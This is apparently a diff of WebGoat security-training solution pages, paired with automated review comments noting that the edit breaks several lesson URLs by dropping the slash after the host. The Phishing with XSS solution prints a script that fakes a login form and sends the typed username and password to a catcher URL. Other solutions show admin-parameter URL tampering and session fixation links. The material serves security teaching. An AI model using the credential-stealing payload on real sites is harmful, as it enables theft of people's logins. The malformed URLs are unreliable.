src="/WebGoat/lesson_solutions/LogSpoofing_files/image008.jpg" v:shapes="Picture_x0020_136"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image008.jpg" v:shapes="Picture_x0020_136"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -759,9 +759,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_137"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/LogSpoofing_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/LogSpoofing_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/LogSpoofing_files/image009.jpg" v:shapes="Picture_x0020_137"><![endif]></span></p>
src="lesson_solutions/LogSpoofing_files/image009.jpg" v:shapes="Picture_x0020_137"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Multi Level Login 1</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Multi Level Login 1</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Multi Level Login 2</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Multi Level Login 2</p>


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>password Strength</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Password Strength</p>
@ -18,13 +18,13 @@ Accounts are only as secure as there passwords. Most users have the same weak pa
<br><br>
<b>Solution:</b><br/>
Open your browser on <a href="https://www.cnlab.ch/codecheck" target="_blank">https://www.cnlab.ch/codecheck</a>. Copy the first password in the field and click "Run the check".<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image001.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image001.jpg"><br/>
<font size="2"><b>Code checker</b></font><br/><br/><br/>
You will get a little pop-up. Choose "Yes, I want this word to be tested".<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image002.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image002.jpg"><br/>
<font size="2"><b>Pop-up</b></font><br/><br/><br/>
You will get get the result of the check.<br><br>
<img src="/WebGoat/lesson_solutions/PasswordStrength_files/image003.jpg"><br/>
<img src="lesson_solutions/PasswordStrength_files/image003.jpg"><br/>
<font size="2"><b>The result</b></font><br/><br/><br/>
Do this with all of the five given passwords.<br><br>
Here are the results you get:<br><br>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/editdata.mso">
<link rel=File-List href="lesson_solutions/PathBasedAccessControl_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/PathBasedAccessControl_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/PathBasedAccessControl_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml">
href="lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -575,9 +575,9 @@ access a file that is not in the listed directory.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_457" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image002.jpg" v:shapes="Picture_x0020_457"><![endif]></span></p>
src="lesson_solutions/PathBasedAccessControl_files/image002.jpg" v:shapes="Picture_x0020_457"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -601,9 +601,9 @@ can be solved by intercepting the filename in WebScarab and replacing it with
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_458"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image004.jpg" v:shapes="Picture_x0020_458"><![endif]></span></p>
src="lesson_solutions/PathBasedAccessControl_files/image004.jpg" v:shapes="Picture_x0020_458"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -618,9 +618,9 @@ field-end'></span><![endif]--> Change the variable File<span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_459"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/PathBasedAccessControl_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image006.jpg" v:shapes="Picture_x0020_459"><![endif]></span><span
src="lesson_solutions/PathBasedAccessControl_files/image006.jpg" v:shapes="Picture_x0020_459"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -2,7 +2,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution Lab Block Stored XSS</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Phishing with XSS</p>
@ -18,7 +18,7 @@ hard for a victim to determinate that the content is malicious.
<p><b>General Goal(s):</b><br/>
The user should be able to add a form asking for username
and password. On submit the input should be sent to
http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
http://localhostcatcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName
</p>
<b>Solution:</b><br/>
@ -40,7 +40,7 @@ Now you need a script:
<p>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;
</p>
@ -52,7 +52,7 @@ calls the script. You can reach this wicht the onclick="myFunction" handler.
The final String looks like this:<br/>
&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; + document.forms[0].pass.value);
XSSImage=new Image; XSSImage.src=&quot;http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+
XSSImage=new Image; XSSImage.src=&quot;http://localhostcatcher?PROPERTY=yes&amp;user=&quot;+
document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
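Review bot: The three catcher URLs in this section (the General Goal paragraph, the script block and the final string) lost the slash between host and path, so the new side reads `http://localhostcatcher?PROPERTY=yes&amp;user=...`, which is not a valid URL and breaks the walkthrough the reader is meant to reproduce. The bulk replacement of `/WebGoat/` removed the only path separator; a well-formed form is at least `http://localhost/catcher?PROPERTY=yes&amp;user=catchedUserName&amp;password=catchedPasswordName`, and because this text is a literal the reader submits rather than a link the server resolves, it should either name the real deployment path (`/WebGoat/` before this commit) or state that the context path belongs there. The same defect appears in the RemoteAdminFlaw section's `http://localhostattack?Screen=71&amp;menu=10` links, which should read `http://localhost/<context-path>/attack?Screen=71&amp;menu=10` with the actual context path filled in.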


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/ReflectedXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ReflectedXSS_files/editdata.mso">
<link rel=File-List href="lesson_solutions/ReflectedXSS_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/ReflectedXSS_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/ReflectedXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ReflectedXSS_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/ReflectedXSS_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/ReflectedXSS_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -623,9 +623,9 @@ the script and do something bad.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1366" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/ReflectedXSS_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/ReflectedXSS_files/image005.jpg" v:shapes="Picture_x0020_1366"><![endif]></span></p>
src="lesson_solutions/ReflectedXSS_files/image005.jpg" v:shapes="Picture_x0020_1366"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -649,9 +649,9 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1367"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:270pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/ReflectedXSS_files/image003.png" o:title="" cropbottom="4085f"/>
<v:imagedata src="lesson_solutions/ReflectedXSS_files/image003.png" o:title="" cropbottom="4085f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=360
src="/WebGoat/lesson_solutions/ReflectedXSS_files/image006.jpg" v:shapes="Picture_x0020_1367"><![endif]></span></p>
src="lesson_solutions/ReflectedXSS_files/image006.jpg" v:shapes="Picture_x0020_1367"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/editdata.mso">
<link rel=File-List href="lesson_solutions/RemoteAdminFlaw_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/RemoteAdminFlaw_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/RemoteAdminFlaw_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -571,9 +571,9 @@ via a URL (/admin) and will not count towards the completion of this lesson. <o:
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_451" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image002.jpg" v:shapes="Picture_x0020_451"><![endif]></span></p>
src="lesson_solutions/RemoteAdminFlaw_files/image002.jpg" v:shapes="Picture_x0020_451"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -604,9 +604,9 @@ browser and hit "Enter"<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_452"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image004.jpg" v:shapes="Picture_x0020_452"><![endif]></span></p>
src="lesson_solutions/RemoteAdminFlaw_files/image004.jpg" v:shapes="Picture_x0020_452"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -619,9 +619,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Clicking on
"User Information" will not work. This is because the URL behind "User
Information" is <a href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10">http://localhost/WebGoat/attack?Screen=71&amp;menu=10</a>
Information" is <a href="http://localhostattack?Screen=71&amp;menu=10">http://localhostattack?Screen=71&amp;menu=10</a>
does not contain the parameter admin=true. Rewrite the URL to become <a
href="http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true">http://localhost/WebGoat/attack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
href="http://localhostattack?Screen=71&amp;menu=10&amp;admin=true">http://localhostattack?Screen=71&amp;menu=10&amp;admin=true</a><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -636,9 +636,9 @@ randomly and can be different in your environment!<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_453"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/RemoteAdminFlaw_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=640 height=369
src="/WebGoat/lesson_solutions/RemoteAdminFlaw_files/image006.jpg" v:shapes="Picture_x0020_453"><![endif]></span><span
src="lesson_solutions/RemoteAdminFlaw_files/image006.jpg" v:shapes="Picture_x0020_453"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span


@ -3,7 +3,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Session Fixation</title>
<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Session Fixation</p>
@ -50,7 +50,7 @@ The mail is already prepared. You only have to alter the link so it includes
a Session ID (SID). You can archive this by adding &SID=WHATEVER to
the link. Of course can WHATEVER be replaced by any other string.
The link should look similar to following:<br>
&lt;a href=http://localhost/WebGoat/attack?Screen=46&menu=320&SID=WHATEVER&gt;
&lt;a href=http://localhostattack?Screen=46&menu=320&SID=WHATEVER&gt;
</p>
<div align="left"><font size="2">
<img src='lesson_solutions/SessionFixation_files/sf_stage1.png'><br>
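Review bot: Removing the `/WebGoat/` segment from an absolute URL also removed the only slash between host and path, so the example link in this hunk now reads `http://localhostattack?Screen=46&menu=320&SID=WHATEVER`, which no browser resolves to the attack servlet; it should read `http://localhost/attack?Screen=46&menu=320&SID=WHATEVER`. The same broken host/path join appears in the RemoteAdminFlaw hunk above (`http://localhostattack?Screen=71&amp;menu=10`, twice) and in the SoapRequest section below (`http://localhostservices/SoapRequest` and `http://neo:80services/SoapRequest`). Unlike the Java changes in this commit, static solution text cannot read the context path from the request, so these absolute URLs need the leading `/` restored explicitly or should be rewritten as paths relative to the application root.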


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SilentTransactions_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SilentTransactions_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SilentTransactions_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/SilentTransactions_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/SilentTransactions_files/colorschememapping.xml">
href="lesson_solutions/SilentTransactions_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -673,9 +673,9 @@ transaction.<br style='mso-special-character:line-break'>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_89" o:spid="_x0000_i1028" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image009.jpg" v:shapes="Picture_x0020_89"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image009.jpg" v:shapes="Picture_x0020_89"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -778,7 +778,7 @@ style='mso-spacerun:yes'>
submitData(accountNo, balance) {<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>var url =
'/WebGoat/attack?Screen=74&amp;menu=1150&amp;from=ajax&amp;newAccount='+
'attack?Screen=74&amp;menu=1150&amp;from=ajax&amp;newAccount='+
accountNo+ '&amp;amount=' + balance +'&amp;confirm=' +
document.getElementById('confirm').value; <o:p></o:p></span></p>
@ -870,9 +870,9 @@ javascript:function();. Try to execute: javascript:submitData(1234556,11000);<o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_90"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image010.jpg" v:shapes="Picture_x0020_90"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image010.jpg" v:shapes="Picture_x0020_90"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -886,9 +886,9 @@ field-end'></span><![endif]--> Follow the hints....</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_91" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/SilentTransactions_files/image011.jpg" v:shapes="Picture_x0020_91"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image011.jpg" v:shapes="Picture_x0020_91"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -905,9 +905,9 @@ submitData(123456,110000);</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_92" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SilentTransactions_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/SilentTransactions_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SilentTransactions_files/image012.jpg" v:shapes="Picture_x0020_92"><![endif]></span></p>
src="lesson_solutions/SilentTransactions_files/image012.jpg" v:shapes="Picture_x0020_92"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/SoapRequest_files/editdata.mso">
<link rel=File-List href="lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SoapRequest_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/SoapRequest_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/SoapRequest_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/SoapRequest_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/SoapRequest_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -658,7 +658,7 @@ Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try
connecting to the WSDL with a browser or Web Service tool. The URL for the web
service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually
service is: http://localhostservices/SoapRequest The WSDL can usually
be viewed by adding a ?WSDL on the end of the web service request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -686,9 +686,9 @@ be viewed by adding a ?WSDL on the end of the web service request.<o:p></o:p></s
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_13" o:spid="_x0000_i1029" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image002.jpg" v:shapes="Picture_x0020_13"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image002.jpg" v:shapes="Picture_x0020_13"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -711,9 +711,9 @@ URL "WebGoat WSDL" to examine the Webservices Description Language file.<o:p></o
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_14"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image004.jpg" v:shapes="Picture_x0020_14"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image004.jpg" v:shapes="Picture_x0020_14"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -732,9 +732,9 @@ number of operations like getFirstName. There are 4 operations defined.<o:p></o:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_15"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/SoapRequest_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/SoapRequest_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/SoapRequest_files/image006.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
src="lesson_solutions/SoapRequest_files/image006.jpg" v:shapes="Picture_x0020_15"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -754,9 +754,9 @@ int and click "Submit".<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
